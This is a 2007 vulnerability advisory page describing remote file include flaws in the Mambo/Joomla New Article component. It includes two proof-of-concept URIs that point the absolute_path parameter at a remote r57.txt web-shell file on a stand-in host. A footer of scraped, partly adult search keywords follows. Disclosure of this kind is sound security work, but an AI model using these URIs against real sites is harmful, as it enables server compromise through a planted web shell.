about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Mambo/Joomla New Article Component Absolute_Path Multiple Remote File Include Vulnerabilities


Title Mambo/Joomla New Article Component Absolute_Path Multiple Remote File Include Vulnerabilities
Published 2007-04-16-12:00AM
Updated 2007-04-17-03:11AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Cold z3ro is credited with discovering these issues.
Vulnerable  Mambo New Article Component 1.1
Not Vulnerable  
Code   Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/joomla_path/components/com_articles.php?absolute_path=http://www.example2.com/r57.txt?
http://www.example.com/classes/html/com_articles.php?absolute_path=http://www.example2.com/r57.txt?
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sun, 08 Nov 2009 07:56:12 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
onArcade iFdate ULTRA XXX www.021-pi ms03-042 microtik wp-login.p www.yulejy Vidiosporn nukedit lo Www.spankw Adult pict Adjd cat+%252Fe www.quanbe WAR FTPD Dog.Sex.Fr www.sex an wallpappe erdin hotsexvedi wwwsexstor www.btclpu PHP NUKE Free 3gp i sexbeeeg PHP NUKE hotsexvedi www.czxfjd http://sho randshop 3x 3gp vid NARUOXXX Free 3gp i 3glc.com www.pink w Dogs sex g ph proxy f Englhis fotoplenka pamla ande www.sexbom indin sexy Indiansex. ranimukhar www.km519. 52/exploit MySQL 4.1. 2...nts/co www.3glc.c